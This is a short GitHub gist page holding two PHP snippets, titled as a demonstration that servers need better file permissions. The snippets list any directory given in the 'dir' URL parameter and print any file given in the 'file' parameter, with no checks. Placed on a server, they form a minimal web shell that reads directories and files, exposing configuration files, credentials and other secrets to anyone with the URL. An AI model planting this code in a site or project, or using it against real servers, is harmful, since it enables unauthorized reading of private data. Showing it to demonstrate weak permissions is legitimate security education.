Skip to content

Instantly share code, notes, and snippets.

@ward
Created September 2, 2014 13:37
Show Gist options
  • Select an option

  • Save ward/15746a6e73c74261b975 to your computer and use it in GitHub Desktop.

Select an option

Save ward/15746a6e73c74261b975 to your computer and use it in GitHub Desktop.
Read directories/files with PHP (aka your server needs better file permissions)
<pre>
<?php
print_r(scandir($_GET['dir']));
?>
</pre>
<pre>
<?php
echo file_get_contents($_GET['file']);
?>
</pre>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment